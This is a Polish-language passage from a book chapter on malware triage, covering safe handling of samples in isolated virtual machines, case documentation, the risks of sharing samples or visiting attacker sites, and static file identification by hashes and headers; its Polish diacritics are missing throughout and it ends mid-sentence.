Ostrzeenie Na pocztku tego rozdziau chcielibymy Ci ostrzec przed niebezpieczestwem, jakie niesie
sortowanie szkodliwych programw. Jakiekolwiek badanie czy analizowanie wirusw i nieznanych
plikw jest ryzykowne! Moesz niewiadomie zainfekowa swj komputer lub komputery
innych osb i spowodowa znaczne szkody. Cho postpowanie zgodnie z naszymi wskazwkami
powinno Ci przed tym uchroni, nie moemy nic zagwarantowa. Zawsze wtedy, gdy opisujemy
metody analizy szkodliwych programw, przyjmujemy, e czynnoci te powinno si wykonywa
w bezpiecznym rodowisku, np. izolowanej maszynie wirtualnej. Pamitaj, e wszystko robisz
na wasne ryzyko!
ROZDZIA 15. SORTOWANIE SZKODLIWYCH PROGRAMW 485
POSTPOWANIE ZE SZKODLIWYM
OPROGRAMOWANIEM
Wiesz ju, jakie s zagroenia podczas pracy ze szkodliwymi i nieznanymi plikami, wic moesz
pozna pewne zasady, ktre powinny uchroni Ci przed wypadkami i uatwi sortowanie.
Stosuj si do naszych wskazwek oraz przestrzegaj zasad obowizujcych w Twojej organizacji,
a take uywaj po prostu zdrowego rozsdku. W ten sposb wypracujesz bezpieczny sposb
postpowania. Protok ten powinien opisywa wszystkie aspekty pracy ze szkodliwym
oprogramowaniem, od czynnoci pocztkowych po zapisanie lub skasowanie programu
po zamkniciu ledztwa. Zalicza si do tego przestrzeganie wymogw bezpieczestwa,
sporzdzenie dokumentacji, dystrybucj oraz okrelenie metod dostpu do szkodliwych miejsc.
Bezpieczestwo
Ryzyko infekcji wasnych systemw minimalizujemy poprzez przestrzeganie dwch
podstawowych zasad.
1. Uycie wirtualnego rodowiska do sortowania. Nigdy nie otwieraj ani nie segreguj
podejrzanych plikw w swoim gwnym systemie operacyjnym. Zamiast tego skonfiguruj
izolowane rodowisko wirtualne lub fizyczne.
a) Utwrz maszyn wirtualn z wybranym systemem operacyjnym, zainstaluj na niej
wszystkie programy i narzdzia analityczne oraz utwrz czyst migawk. Bdzie ona
penia rol punktu kontrolnego, do ktrego zawsze mona wrci w razie problemw.
b) Na bieco aktualizuj oprogramowanie wirtualizacyjne.
c) Wycz niepotrzebne udogodnienia, takie jak funkcja przecigania i wsplnego
uytkowania schowka. Z funkcji tych korzystaj tylko wtedy, gdy maszyna wirtualna
jest czysta.
d) Dobrze odizoluj maszyn wirtualn od systemu gospodarza. Moesz skonfigurowa
izolowane sieci wirtualne, aby symulowa czno lub usugi, ale maszyna wirtualna
nie moe mie dostpu do sieci, ktre musz by wolne od infekcji. Nie zezwalaj
maszynie wirtualnej na dostp do internetu, chyba e akurat znajduje si w czystym
stanie z migawki. Wikszo maszyn wirtualnych umoliwia aktualizacj
oprogramowania przez przecigniciu plikw z systemu gospodarza.
e) Po zakoczeniu analizy natychmiast przywr czysty stan pocztkowy w maszynie
wirtualnej.
2. Zmienienie konfiguracji i procesw. Ryzyko zainfekowania systemu gwnego mona
znacznie zredukowa przez wprowadzenie pewnych zmian w konfiguracji i procesach.
a) Uywaj aktualnej wersji gwnego systemu operacyjnego.
b) Zainstaluj wszystkie atki i aktualizacje, wcznie z poprawkami do programw
firm trzecich.
c) Wycz funkcje podgldu, np. okienko podgldu w Eksploratorze Windows.

Czasami sam podgld pliku moe spowodowa infekcj systemu.
d) Wycz funkcje automatycznego uruchamiania i montowania.
e) Wyranie oznakuj noniki uywane do przenoszenia podejrzanych plikw. Noniki USB
s bardzo wygodne, ale trudno je wyranie oznaczy, poniewa s mae. Lepszym
rozwizaniem jest uywanie pyt CD z duym czerwonym napisem informujcym,
e ten nonik zawiera podejrzane oprogramowanie. Dodatkowo docz list plikw
ze skrtami MD5, aby mona byo zweryfikowa zawarto pyty.
f) Do pracy ze szkodliwym oprogramowaniem uywaj konta uytkownika o niskich
uprawnieniach.
g) Na kocu rozszerze szkodliwych programw dodawaj znak podkrelenia. Przykadowo
zmie rozszerzenie .exe na .exe_. W ten sposb zapobiegniesz przypadkowemu
uruchomieniu tych plikw. Aby w systemach Apple OS X zapobiec przypadkowemu
otwarciu pliku przez macierzyst aplikacj, moe by konieczne zmienienie jego typu.
h) Wszystkie szkodliwe programy i archiwa takich aplikacji przechowuj w katalogu bez
prawa do uruchamiania plikw i dostpnym tylko dla uytkownika bez wysokich
uprawnie.
i) Wszystkie podejrzane programy przechowuj w chronionym hasem i zaszyfrowanym
archiwum, np. ZIP albo RAR. Uywaj jakiego oglnie znanego hasa, np. zainfekowany,
bo nie chodzi o ochron zawartoci, tylko o zapobieenie przypadkowemu uruchomieniu
lub usuniciu. Pewnie wydaje Ci si, e ochrona przed skasowaniem nie jest bardzo
istotna, ale programy antywirusowe mog usun szkodliwe programy bez pytania
o zgod.
j) Uywaj podejrzanych programw tylko w rodowisku maszyny wirtualnej lub innym
izolowanym systemie. Jedynym wyjtkiem jest zapisanie pliku na dysku, obliczenie
sumy MD5, utworzenie archiwum i przesanie go do rodowiska analitycznego.
Zalecamy nawet, by unika obliczania sumy kontrolnej i przegldania acuchw
poza rodowiskiem sucym do sortowania. Oglnie warto wyrobi sobie nawyk, e
ze szkodliwymi programami pracuje si tylko w przeznaczonym do tego rodowisku.
Dokumentacja
Wrczenie komu kopii szkodliwego programu z komentarzem zbadaj to nie jest najlepszym
podejciem do analizy szkodliwego oprogramowania. ledczy powinni przekaza szczegowe
informacje, ktre mog by pomocne w analizie, a analityk szkodliwego oprogramowania
powinien wypyta ledczych o dane, ktrych mu brakuje. Podczas pracy z wirusami zawsze
powinno si wszystko opisywa i rejestrowa wszystkie szczegy kontekstowe. Oto kilka pyta,
ktre warto rozway podczas pisania takiej dokumentacji.
Jak zidentyfikowano plik? Czy np. zgosi zwizane z nim zagroenie jaki program
zabezpieczajcy, taki jak antywirus? Czy moe to ledczy znalaz ten plik za pomoc
jakiej techniki? Jeli tak, to co dokadnie zrobi?
W jakiej wersji systemu operacyjnego znaleziono plik? Naley zanotowa dokadny numer
z okreleniem zainstalowanych atek oraz to, czy by to system 32-, czy 64-bitowy.
Jaka bya oryginalna nazwa pliku i w jakim katalogu zosta znaleziony? Dodaj te sum
MD5 lub inn sum kontroln (np. SHA256).
Czy na podstawie sumy kontrolnej da si rozpozna plik tzn. czy figuruje w jakiej bazie
danych plikw?
Czy s inne pliki, ktre mog by powizane z danym plikiem ze wzgldu na blisko
miejscow lub czasow?
Czy artefakty lub inne odkrycia dokonane w toku ledztwa pozwalaj domyla si,
czym jest dany program (np. odkryte protokoy lub porty sieciowe)?
Czy znaleziono dowody wykonywania programu w wierszu polece albo wykorzystania
mechanizmw typu zarzdzaj i kontroluj?
Jeeli program jest utrwalony, to czy s jakie lady wskazujce na sposb jego utrwalenia?
Czy analiza osi czasowej wykazaa jakiekolwiek pozycje, np. pliki albo klucze rejestru, ktre
zostay utworzone, zmodyfikowane lub uyte w czasie instalacji lub korzystania ze szkodliwego
programu?
Jakie inne rodzaje szkodliwego oprogramowania znaleziono podczas ledztwa?
Czy w toku ledztwa odkryto lady pozwalajce myle o jakim konkretnym zagroeniu?
Czy s dowody na to, e haker aktywnie korzysta z programu? Czy s dowody na to,
e incydent cay czas trwa?
Niektre z tych pyta mog wydawa si nieistotne lub zbyt uproszczone, ale odpowiedzi na
nie dostarczaj faktw w odniesieniu do kontekstu, ktrych nie mona ustali przy uyciu analizy
szkodliwego programu. W niektrych przypadkach fakty te pozwalaj znacznie skrci czas
sortowania. Sami bolenie przekonalimy si, e zaniedbania w sporzdzaniu dokumentacji
kontekstu s kosztownym bdem.
Dystrybucja
Z naszych dowiadcze wynika, e wiele organizacji rutynowo przesya szkodliwe programy
nie tylko do producentw oprogramowania antywirusowego, z ktrego korzysta, lecz rwnie
do innych organizacji i portali, ktrym ufaj. Jeli znalaze si w sytuacji kryzysowej i szukasz
pomocy, trudno oprze si pokusie skorzystania z tych rozwiza. Czsto nie ma po prostu innego
wyjcia. Sugerowalibymy jednak powcigliwo w tym zakresie i rozwaenie potencjalnych
negatywnych skutkw przekazania szkodliwych programw komukolwiek na zewntrz wasnej
organizacji.
Pewnie zastanawiasz si, jakie to negatywne konsekwencje moe wywoa przekazanie wirusa
komu innemu? Pamitaj wic, e wiele atakw przypomina zabaw w kotka i myszk. Gdy haker
dowie si o Twoich dziaaniach, najprawdopodobniej zmieni taktyk, poniewa zorientuje si,
e zosta wykryty. Oto kilka innych kwestii, ktre naley rozway.
Szkodliwe programy wykorzystywane do przeprowadzania atakw skierowanych
na konkretny cel mog zawiera informacje pozwalajce zidentyfikowa organizacj.
Wrd nich mog nawet znajdowa si hasa i nazwy uytkownikw pozwalajce na
uwierzytelnienie w serwerach proxy i zdobycie dostpu do systemw przez internet.
Czy na pewno chcesz, aby takie informacje trafiy w obce rce? Wikszo portali z usug
sortowania szkodliwych programw jest prowadzona przez producentw programw
antywirusowych lub osoby, ktre maj z nimi kontakt. Czy chcesz ryzykowa, e wszyscy
dowiedz si, e Twoja organizacja pada ofiar hakera?
Jeli program antywirusowy lub inny program zabezpieczajcy utworzy sygnatur albo
inny automatycznie wdraany rodek zaradczy, czy spowoduje to utrudnienia w Twoim
ledztwie albo pokrzyuje plany rozwizania problemu? Z naszego dowiadczenia wynika,
e wikszo rodkw zaradczych stosowanych przez firmy od zabezpiecze w odniesieniu
do indywidualnych zagroe to tylko rozwizania poowiczne, ktre czsto nie obejmuj
caego problemu zazwyczaj te niekompletne rozwizania powoduj tylko, e haker
zostanie powiadomiony, i kto go wykry, i w duszej perspektywie przyczyniaj si
do utrudnienia ledztwa.
Czy Twoja organizacja ma gotowy i wyprbowany plan dziaania na wypadek katastrofy?
Jeli haker dowie si, e zosta wykryty, moe sprbowa zrobi co destrukcyjnego.
Naley zastanowi si z gry, jakie mogyby by tego skutki i przygotowa si
do ewentualnej obrony.
Nie twierdzimy, e szkodliwe programy naley ukrywa, tylko sugerujemy rozwaenie
wszystkich plusw i minusw ich ujawnienia. Jeli zdecydujesz si wysa wirus do jednostki
zewntrznej, postaraj si, aby wszystko odbyo si na Twoich warunkach i dobrze to przemyl.
Dostp do szkodliwych witryn internetowych

Wyobra sobie tak sytuacj: badasz zainfekowany system. Analizujesz o czasow i odkrywasz,
e chwil przed pojawieniem si szkodliwego programu uytkownik wszed na nieznan Ci stron
internetow. Co robisz? Moe wejdziesz na t stron ze swojego komputera? A moe sprbujesz si
im odgry? Moesz nie wierzy, ale wanie takie dziaania podejmuje wiele organizacji, z ktrymi
mielimy okazj pracowa. Zdarza si to tak czsto, e nie moglimy tego zbagatelizowa. Dlatego
podkrelamy: generalnie nigdy nie naley wchodzi na szkodliwe strony internetowe. Jest kilka powodw
takiego postpowania. Niektre dotycz Twojej organizacji, a inne take innych organizacji.
Moesz spowodowa infekcj swojego komputera, czego skutki bd opakane.
Moesz ostrzec hakerw, e zostali wykryci.
Moesz cign na siebie uwag hakerw.
Szkodliwa strona moe by tylko jedn z ofiar.

Moesz przeszkodzi w dziaaniu dobrym ludziom.
Moesz zama prawo. W niektrych organizacjach dochodzono do wniosku, e mona
uy danych powiadczajcych wykorzystanych przez hakera w celu uzyskania dostpu
do systemw znajdujcych si w internecie. Jednak w wikszoci przypadkw nie jest to
dobry pomys.
Niektre organizacje rozumuj, e to ryzyko ich nie dotyczy lub e je zminimalizowali.
Czasami dowiadujemy si, e kto w celu zamaskowania si uy sieci serwerw proxy, np. Tor,
w celu wejcia na stron ze swojego domu (to tylko przenosi ryzyko). Takie dziaania mog by
efektywne tylko w nielicznych przypadkach. Oglnie rzecz biorc, s to powane sprawy, ktre
trzeba dokadnie przemyle, zanim wejdzie si na potencjalnie szkodliw stron internetow.
Gdy ju co zrobisz, nie da si tego cofn. A jeli rzeczywicie postanowisz dziaa, zrb to wg
z gry obmylonego planu oraz zapisz dat i godzin przeprowadzenia akcji.
Ostrzeenie Prost drog do utraty bezpieczestwa i proszeniem si o kopoty prawne jest odgryzanie si
hakerom tym samym (czyli prbowanie znalezienia i usunicia swoich informacji z innych,
potencjalnie zdobytych serwerw). Najlepiej zgosi swoje problemy organom cigania
i w porozumieniu z prawnikami wsppracowa z wacicielami domen. Branie spraw w swoje
rce moe mie bardzo przykre konsekwencje.
Przede wszystkim naley podkreli jedn rzecz dotyczc danych powiadczajcych. Jeeli
w Twojej organizacji uda si wykry ruch wychodzcy z uyciem danych powiadczajcych
(np. do konta FTP) i kto je wykorzysta w celu sprawdzenia przesanych w ten sposb plikw,
bdzie to oznaczao popenienie przestpstwa. W takim przypadku nie maj znaczenia nasze
intencje, nawet jeeli podamy za wasnymi skradzionymi informacjami. Wikszo specjalistw
od bezpieczestwa informatycznego, ktrzy promuj pomys zaatakowania hakerw ich wasn
broni, ma niewielk wiedz w zakresie RI i prawa. Osoby te nie powinny mie nic do powiedzenia
w prowadzonych ledztwach.
RODOWISKO DO SORTOWANIA
Jak napisalimy w podrozdziale o rodkach bezpieczestwa przy pracy ze szkodliwymi programami,
pliki takie naley analizowa wycznie w odpowiednio skonfigurowanym rodowisku testowym.
Naszym zdaniem nadaj si do tego dwa rodzaje rodowisk fizyczne systemy w izolowanej
fizycznej sieci lub systemy wirtualne w izolowanej (programowo) sieci wirtualnej. Sprawdzimy
teraz, jakie s zalety i wady kadego z tych rozwiza, a potem przejdziemy do opisu konfiguracji
wybranego rodowiska.
Zaczniemy od przyjrzenia si rodowisku fizycznemu. Jest to takie rodowisko, w ktrym analiz
przeprowadza si w systemie operacyjnym dziaajcym bezporednio na platformie sprztowej
(bez uycia wirtualizacji). Oprcz samego systemu, potrzebny jest sprzt sieciowy, np. przecznik
Ethernet i okablowanie, jak rwnie klawiatura, monitor i mysz. Dodatkowo trzeba znale miejsce
do postawienia tego sprztu. Dostp do niego powinien by cile kontrolowany, aby zabkani
administratorzy sieci nie prbowali nic w nim naprawia. Nastpnie naley opracowa harmonogram
korzystania z tych zasobw i w kocu sposb przywracania systemu do znanego stanu po kadej
sesji analitycznej. W niektrych organizacjach przygotowanie takiego rodowiska roboczego
nie sprawia najmniejszych trudnoci sprzt, oprogramowanie i miejsce s dostpne od zaraz.
Jednak wikszo organizacji szuka bardziej ekonomicznych rozwiza. Dlatego dalej w tym rozdziale
opisujemy metody konfiguracji wirtualnych rodowisk do sortowania szkodliwych programw.
W rodowisku wirtualnym analiz wykonuje si przy uyciu maszyny wirtualnej. Do jej
utworzenia potrzebny jest specjalny program i system fizyczny, w ktrym mona go zainstalowa,
najczciej komputer jednego z pracownikw. Konfiguracja ta nie wymaga zakupu dodatkowego
sprztu ani wygospodarowywania miejsca, cho moe by konieczne zwikszenie iloci pamici
lub wstawienie dysku twardego o wikszej pojemnoci. Zalet tego rozwizania jest elastyczno
mona atwo dodawa, usuwa oraz konfigurowa systemy i sieci wirtualne. Ponadto nie ma
problemu z blokowaniem zasobw, poniewa kady analityk moe utworzy sobie wasne
rodowisko pracy. System wirtualny mona atwo przywrci do prawidowego stanu za pomoc
migawki, co uatwia eksperymentowanie i eliminuje ryzyko pomieszania danych z rnych spraw.
Potencjaln wad tego rozwizania jest to, e w nielicznych przypadkach szkodliwe programy
w rodowisku wirtualnym mog dziaa inaczej ni w rodowisku fizycznym. Wwczas mog
wystpi problemy z sortowaniem i bdy w interpretacji sposobu dziaania analizowanych wirusw.
Z wikszoci takich problemw mona sobie poradzi, stosujc indywidualne podejcie. Oglnie
rzecz biorc, naszym zdaniem wykorzystanie maszyn wirtualnych jest wygodniejszym i taszym
rozwizaniem ni posugiwanie si maszynami fizycznymi. Trzeba jednak przyzna, e w niektrych
przypadkach gdy podejrzany plik dziaa inaczej w systemie wirtualnym, a inaczej w fizycznym
jedyn moliwoci jest uycie sprztu fizycznego. W zwizku z tym, nawet jeli Twoja
organizacja nie analizuje szkodliwych programw w rodowisku fizycznym, warto zastanowi si,
co jest potrzebne do tymczasowego skompletowania takiego systemu dla wybranej sprawy.
Uwaga Czasami docieraj do nas opinie, e nie naley analizowa szkodliwych programw w rodowiskach
wirtualnych, poniewa programy te zachowuj si w nich inaczej ni w rodowiskach fizycznych.
Cho istotnie tak moe by, takie przypadki s bardzo nieliczne. Pomyl, jak powszechne s
maszyny wirtualne w dzisiejszym biznesie. Niektre organizacje nie tylko korzystaj z wirtualnych
rodowisk serwerowych, ale nawet uywaj wirtualizacji w zwykych komputerach biurkowych.
Gdyby szkodliwe programy nie dziaay w takich rodowiskach prawidowo, ich twrcy znacznie
ograniczyliby swoje moliwoci. Dlatego podczas sortowania szkodliwych programw
nie przejmujemy si takimi sprawami jak rnice w sposobie ich dziaania w rodowiskach
wirtualnych. Jeli istnieje podejrzenie, e dany wirus zachowuje si rnie, w zalenoci od rodzaju
rodowiska, mona skorzysta z pomocy dowiadczonego analityka. Dla takich specjalistw nie
stanowi to adnego wyzwania.
KONFIGURACJA RODOWISKA WIRTUALNEGO

Pierwsz czynnoci jest wybr technologii wirtualizacji. Do dyspozycji mamy kilka zarwno
patnych, jak i darmowych rozwiza takich firm jak VMware, Microsoft, Parallels, Citrix i Oracle.
Niektre programy wymagaj powicenia caego hosta, co nie jest najlepszym pomysem. Naszym
ulubionym rozwizaniem jest VMware Workstation. Jest to program o dobrym stosunku zasobu
funkcjonalnoci do ceny. Szczeglnie przydatne s funkcje tworzenia i przywracania migawek
oraz moliwo konfiguracji wielu odizolowanych od siebie wirtualnych sieci. Dobrym darmowym
rozwizaniem jest program VirtualBox firmy Oracle. Nie ma tak bogatej funkcjonalnoci jak VMware,
ale jest cay czas doskonalony. Jako e technologie cigle si zmieniaj, poniej przedstawiamy kilka
oglnych wskazwek, ktrych warto przestrzega przy wyborze i konfiguracji rodowiska wirtualnego.
Moliwo instalacji zarwno starych, jak i nowych systemw operacyjnych.
Obsuga rnych rodzajw architektury (np. x86 i ARM).
Moliwo tworzenia i przywracania systemu z migawek, aby atwo cofa wprowadzone
zmiany.
Mechanizmy ochronne uniemoliwiajce zainfekowanym maszynom wirtualnym robienie
szkd poza rodowiskiem wirtualnym.
Funkcje usprawniajce prac, np. uatwienia przesyania plikw midzy systemem
gospodarzem i gociem. Pamitaj jednak, e z funkcji tych naley korzysta wycznie
wtedy, gdy maszyna jest czysta.
Do analizy szkodliwych programw z systemu Windows najczciej wykorzystujemy system
Windows XP. Po zainstalowaniu wszystkich atek i aplikacji analitycznych naley utworzy
migawk maszyny wirtualnej. W migawce tej zostanie zapisany stan maszyny, ktry bdzie mona
przywrci w dowolnym momencie. Powinno si korzysta z tej funkcji przed rozpoczciem
kadej sesji testowej.
Po skonfigurowaniu rodowiska testowego mona rozpocz waciw prac, czyli badanie
podejrzanych programw. W rozdziale tym przedstawiamy podstawowe wiadomoci o dwch
metodach analizy statycznej i dynamicznej. Kada z nich lepiej sprawdza si w innych
sytuacjach, wic najlepiej zna obie.
ANALIZA STATYCZNA
Jedna z dwch oglnych metod analizy szkodliwego oprogramowania to analiza statyczna.
Polega ona na badanu pliku za pomoc technik niewymagajcych wykonywania kodu. W ten
sposb mona szybko okreli podstawow funkcjonalno pliku wykonywalnego. Poniewa
jednak kod bywa bardzo skomplikowany, za pomoc tej metody rzadko udaje si zdoby peny
obraz tego, co robi badany program.
Co to za plik
Masz ju bezpieczne rodowisko do badania plikw, wic moesz wzi si do pracy. W trakcie
prowadzonych ledztw czsto znajdujemy wiele plikw, ktrym chcielibymy dokadniej si
przyjrze. Czasami mamy wynikajce z kontekstu silne przesanki, e dany plik jest szkodliwy,
a czasami po prostu intuicyjnie podejrzewamy, e z jakim plikiem co jest nie tak. Poza tym
szkodliwe pliki mog pochodzi z wielu rde, np. analiz ledczych, analiz na ywo, systemw
antywirusowych, systemw monitorowania sieci itd. Jedn z pierwszych trudnoci, jakie napotkasz,
moe by okrelenie oglnej natury pliku i wydobycie z niego przydatnych informacji. Teraz
wyjanimy dokadniej, o co chodzi.
Szkodliwe programy wystpuj w najrniejszych formach i rozmiarach. Musisz zdawa sobie
spraw, e nazwa i rozszerzenie pliku nic nie mwi o jego przeznaczeniu. Pliki wykonywalne nie
musz mie rozszerzenia exe, a pliki z tym rozszerzeniem nie musz by wykonywalne. Ponadto
szkodliwe programy nie zawsze s wykonywalne w sposb bezporedni, tzn. system operacyjny
moe adowa instrukcje z tych plikw wprost do wykonania przez procesor CPU. Przykadowo
skrypty w jzykach interpretowanych, takich jak Python i Visual Basic, nie s wykonywalne
bezporednio inne programy musz je przekonwertowa na co, co nadaje si do wykonania
przez CPU. Innym przykadem s biblioteki wspdzielone, cho to nieco inna sprawa ni skrypty
w jzykach interpretowanych. Biblioteki wspdzielone zazwyczaj zawieraj kod wykonywalny
dla CPU, tylko musz najpierw zosta zaadowane przez jaki program. A niektre szkodliwe
programy s pakowane, tzn. skompresowane lub zaszyfrowane. Ponadto niektre systemy
przechwytujce i przechowujce szkodliwe oprogramowanie (np. programy antywirusowe
i zabezpieczajce) koduj takie programy we wasnym formacie, aby zapobiec ich uruchomieniu.
Wszystkie te czynniki mog znacznie utrudni dowiadywanie si, czym jest i co robi dany plik.
Szukanie informacji
Skutecznym sposobem na zaoszczdzenie duej iloci czasu, gdy chce si co osign, jest
kopiowanie cudzych rozwiza. Oczywicie nie nakaniamy do oszustwa, tylko zachcamy
do wykorzystywania wynikw prac innych osb. Istnieje kilka znanych baz danych, w ktrych
skatalogowano miliony plikw przeanalizowanych przez rne organizacje. Moe warto do nich
zajrze, zanim zacznie si analiz we wasnym zakresie?
Podczas szukania informacji o pliku najlepszym sposobem na uniknicie pomyki jest uycie
skrtu kryptograficznego. Cho nazwa pliku te czasami bywa przydatna w poszukiwaniach, skrt
identyfikuje zawarto pliku ponad wszelk wtpliwo. Najczciej uywanym algorytmem do
identyfikacji plikw jest MD5 (ang. Message-Digest Algorithm 5). Istniej take nowsze algorytmy,
np. SHA1 i SHA2 (ang. Secure Hash Algorithm), cho nie s one jeszcze wykorzystywane przez
wszystkie serwisy. Gwn rnic midzy tymi algorytmami jest to, e skrty SHA s bardziej
niezawodne i gwarantuj znacznie mniejsze ryzyko wystpienia kolizji, czyli wytworzenia takiego
samego skrtu dla dwch rnych plikw. Nie przejmuj si tym zbytnio, poniewa ryzyko wpywu
tego na ledztwo jest ekstremalnie niskie.
Do wygenerowania skrtu MD5 dla pliku potrzebne jest specjalne narzdzie. Wikszo
systemw uniksowych zawiera wbudowane przynajmniej jedno takie narzdzie. Najczciej
spotykane nazwy ich plikw wykonywalnych to md5, md5sum, sha1sum itd. System Windows
nie ma takiego standardowego narzdzia, wic trzeba je zainstalowa. Jest ono dostpne np.
w rodowisku Cygwin, ale mona te zainstalowa programy md5deep, DigestIT2004 czy WinMD5.
W INTERNECIE
md5deep md5deep.sourceforge.net
DigestIT2004 www.colonywest.us/digestit
WinMD5 www.winmd5.com
Po obliczeniu skrtw mona zacz szuka informacji. Najbardziej znane rda to FileAdvisor
firmy Bit9, VirusTotal, ThreatExpert oraz National Software Reference Library (NSRL) instytutu
NIST (ang. National Institute of Standards and Technology). Przy zetkniciu z nieznanym plikiem
dobrym pomysem jest zacz prac od przeszukania tych baz danych.
W INTERNECIE
FileAdvisor fileadvisor.bit9.com
VirusTotal www.virustotal.com
ThreatExpert www.threatexpert.com
NSRL www.nsrl.nist.gov
Dostp do bazy danych FileAdvisor firmy Bit9 jest darmowy, ale uytkownik moe wykona
tylko ograniczon liczb zapyta. Jeli wic chcesz mie moliwo sprawdzania wielu plikw,
musisz skontaktowa si z Bit9 w celu znalezienia rozwizania. W bazach danych VirusTotal
i ThreatExpert mona szuka nie tylko skrtw, lecz rwnie nazw plikw i innych atrybutw
charakterystycznych dla szkodliwych programw lub innych plikw. Ponadto bazy te dostarczaj
wicej informacji, czasami nawet zawierajcych wyniki kompletnej analizy szkodliwego programu.
Baz danych NSRL mona pobra za darmo, ale NIST nie udostpnia adnej wyszukiwarki.
SANS udostpnia usug wyszukiwania informacji w bazie danych NSRL, ale mona wpisa tylko
jeden skrt na raz. Alternatywnym rozwizaniem jest pobranie plikw bazy danych na komputer
i przeszukanie ich za pomoc takich narzdzi jak GREP. Jeli jednak planujesz intensywnie
korzysta z bazy danych, ta metoda jest niepraktyczna. W takim przypadku lepszym rozwizaniem
jest wczytanie plikw NSRL do bazy danych, utworzenie indeksw na kolumnach skrtw
i wykonywanie normalnych zapyta SQL. Istnieje te wyszukiwarka do bazy danych NSRL o nazwie
nsrlquery. Jest dostpna w internecie i mona z niej korzysta za pomoc normalnych pocze
klient-serwer. Jeeli nie chcesz konfigurowa serwera, istnieje dostpny publicznie serwer firmy
Kyrus. Wicej informacji o narzdziu nsrlquery mona znale na stronach internetowych.
W INTERNECIE
Wyszukiwarka skrtw SANS isc.sans.edu/tools/hashsearch.html
Narzdzie nsrlquery nsrlquery.sourceforge.net
Publiczny serwer nsrlquery firmy Kyrus www.kyrus-tech.com/nsrlookup-service-beta
Ponadto warto poszuka skrtw w zwykych wyszukiwarkach internetowych, takich jak

np. Google, cho trzeba uwaa z interpretacj wynikw. W internecie informacje umieszcza
wiele osb bez odpowiedniego przygotowania w dziedzinie bezpieczestwa komputerowego
i pozbawionych potrzebnej wiedzy, przez co ich dane mog by mylne. Niektre nazwy plikw
i inne acuchy znajdowane w szkodliwych programach wystpuj czsto, ale nie s cile zwizane
ze szkodliwym oprogramowaniem. Ponadto naley pamita, e niektrzy hakerzy dostosowuj
swoje programy do celw ataku, wic nawet jeli dana aplikacja jest powszechnie znana jako wirus,
jej skrt moe nie by dokadnie taki sam jak w bazach danych.
Rczne szukanie skrtw to mudne zadanie, cho w wikszoci ledztw nie trzeba wyszukiwa
ich zbyt wielu naraz. Jeeli musisz przebada kilkaset plikw, prawdopodobnie s lepsze metody
na zredukowanie tej liczby.
Nagwki plikw
Nagwek pliku to niewielka liczba bajtw na pocztku umoliwiajca m.in. identyfikacj pliku.
Czasami nagwek nazywa si magiczn liczb. Liczba bajtw nagwka rni si, w zalenoci
od typu pliku, ale z reguy typ pliku mona okreli na podstawie zawartoci szesnastu pierwszych bajtw
danych. Jeli np. znajdziesz plik zaczynajcy si od dwch bajtw 0x4D5A (MZ), moesz podejrzewa,
e jest to plik wykonywalny systemu operacyjnego firmy Microsoft. Istniej narzdzia do identyfikacji
plikw. Tu opisujemy dwa z nich, czyli edytor szesnastkowy FileInsight firmy McAfee i polecenie file.
Pierwsz nasz czynnoci, gdy otrzymamy nieznany plik, jest otwarcie go w dobrym edytorze
szesnastkowym i sprawdzenie jego nagwka. Naszym ulubionym darmowym narzdziem tego
typu jest program FileInsight firmy McAfee, a patnym program 010 Editor, cho dostpnych
jest wiele innych rwnie dobrych rozwiza.
W INTERNECIE
FileInsight www.mcafee.com/us/downloads/free-tools/fileinsight.aspx
010 Editor www.sweetscape.com/010editor
Gdy zdobdziesz troch dowiadczenia w badaniu plikw, nauczysz si szybko rozpoznawa

charakterystyczne wzorce. Jeli np. na pocztku otwartego pliku znajduj si bajty MZ, gdzie
w okolicach od 80. do 100. pozycji szesnastkowej znajduj si bajty PE oraz acuchy .text,
.data, .rsrc lub podobne w okolicach pozycji szesnastkowej 1F0, od razu domylisz si, e
masz do czynienia z przenonym plikiem wykonywalnym PE. Badajc plik za pomoc edytora
szesnastkowego, informacje te dostrzeesz po przegldniciu tylko pocztkowych porcji
wywietlonych danych (rysunek 15.1).
RYSUNEK 15.1.Szesnastkowy widok pliku PE
Jeeli interesuj Ci szczegowe informacje o formacie PE, moesz przeczyta jego

dokumentacj w portalu Microsoft Developer Network (MSDN).
W INTERNECIE
msdn.microsoft.com/library/windows/hardware/ gg463125
Kiedy pocztkowo wydawao si, e dany plik by wykonywalny, ale nie wida w nim wymienionych
acuchw, znaczy to, e w rzeczywistoci moe to by inny rodzaj pliku. Moliwe te, e zosta on
w jaki sposb spreparowany lub zakodowany. W takim przypadku najlepiej zastosowa inn
technik, np. uy polecenia file, aby dowiedzie si, co to za plik.
Polecenie file pochodzi z systemu Unix i nie stanowi standardowego elementu systemu
Windows. Wykorzystuje ono magiczny plik zawierajcy list magicznych liczb. Liczby te to
sekwencje bajtw z reguy w nagwku, ale mog by te ze stopek identyfikujce rne typy
plikw. Aby posugiwa si tym poleceniem w maszynie wirtualnej z systemem Windows, naley
zainstalowa rodowisko uniksowe, np. Cygwin, ktre jest prawie kompletne i zawiera powok
BASH z wieloma poleceniami Uniksa, np. cut, sed, awk, less, vi i file.
W INTERNECIE
www.cygwin.com
Podczas instalacji rodowiska Cygwin musisz wybra pakiet file, ktry nie jest domylnie
instalowany. Gdy ju polecenie stanie si dostpne w systemie, posugiwanie si nim nie sprawi
nikomu kopotu wystarczy mu przekaza nazw pliku do zbadania. Jeli np. chcesz przyjrze si
wszystkim plikom znajdujcym si w katalogu C:\Windows, moesz wykona nastpujce polecenie:
file /cygdrive/c/Windows/*
Narzdzie zwrci dug list informacji, ale mona wrd nich znale pewne fragmenty
doskonale ilustrujce, jak bardzo jest to przydatny program, jeli chodzi o identyfikacj plikw
na podstawie nagwkw:
twunk_16.exe: MS-DOS executable, NE for MS Windows 3.x
twunk_32.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Vss: directory
win.ini: ASCII text, with CRLF line terminators
WMSysPr9.prx: Little-endian UTF-16 Unicode text, with CRLF line terminators
write.exe: PE32+ executable (GUI) x86-64, for MS Windows
Poniej znajduj si wyniki zwrcone dla wybranych plikw z katalogu C:\Windows\system32:

appmgr.dll: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
C_037.NLS: data
ipconfig.exe: PE32 executable (console) Intel 80386, for MS Windows
PerfCenterCpl.ico: MS Windows icon resource - 9 icons, 48x48, 256-colors
Jak wida, polecenie to zwraca cakiem przydatne wyniki. Jednak czasami narzdzie file
nie potrafi zidentyfikowa typu pliku i wwczas wywietla typ oglny, np. data albo ASCII text.
W nielicznych przypadkach zdarza si te bd w identyfikacji typu pliku. Polecenie moe
